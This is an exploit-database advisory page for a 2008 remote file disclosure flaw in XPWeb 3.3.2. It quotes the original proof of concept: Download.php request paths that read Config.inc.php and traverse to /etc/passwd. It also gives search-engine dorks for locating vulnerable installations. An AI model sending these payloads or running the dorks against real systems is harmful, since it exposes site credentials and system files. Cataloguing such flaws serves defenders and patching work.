header-logo
Suggest Exploit
vendor:
XPWeb
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: XPWeb
Affected Version From: 3.3.2002
Affected Version To: 3.3.2002
Patch Exists: Yes
Related CWE: N/A
CPE: a:xpweb:xpweb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability

XPWeb 3.3.2 is vulnerable to remote file disclosure. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This can be done by appending the file path to the vulnerable URL. For example, an attacker can send a request to the vulnerable URL “/XPWeb_v3.3.2/Download.php?url=Config.inc.php” to view the contents of the “Config.inc.php” file. Similarly, an attacker can send a request to the vulnerable URL “/XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd” to view the contents of the “/etc/passwd” file.

Mitigation:

Upgrade to the latest version of XPWeb 3.3.2 or later.
Source

Exploit-DB raw data:

### XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
### http://puzzle.dl.sourceforge.net/sourceforge/xpweb/XPWeb_v3.3.2.tgz
### POC :
###    /XPWeb_v3.3.2/Download.php?url=Config.inc.php
###    /XPWeb_v3.3.2/Download.php?url=../../../../../../../etc/passwd
### Dorks : intitle:XPWeb 3.3.2
###        intitle:XPWeb 3.0.1
### I'm tryagi .. TRYAG.Cc/cc

# milw0rm.com [2008-02-17]

Navigation

Suggest Exploit

Services By CQR